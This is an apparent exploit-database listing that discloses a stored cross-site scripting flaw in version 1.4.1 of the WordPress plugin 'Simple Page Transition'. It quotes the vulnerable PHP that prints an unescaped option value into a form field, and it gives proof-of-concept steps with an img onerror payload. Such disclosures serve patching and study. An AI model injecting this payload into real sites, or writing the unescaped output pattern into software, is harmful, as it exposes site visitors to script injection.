Share
## https://sploitus.com/exploit?id=PACKETSTORM:167597
# Exploit Title: WordPress Plugin āSimple Page Transitionā - Stored Cross
Site Scripting
# Date: 27-06-2022
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/
# Version: 1.4.1
# Tested on: Firefox
# Contact me: mariamtariq404@gmail.com
*#Vulnerable code*:
```
<label for="simple_page_transition_ignored"><?php _e( 'Ignored Download
Links', 'spt' ); ?></label><br />
<input type="text" id="simple_page_transition_ignored"
name="simple_page_transition_ignored" value="*<?php print
$simple_page_transition_ignored; ?>*" /><br />
```
*#POC:*
1- Install the plugin āsimple page transitionā & activate it.
2- Navigate towards the āignored download linksā
3- Enter the XSS payload ` *ā><img src=x onerror=alert(1)>*`
*#POC image:*
https://imgur.com/yzaTkhi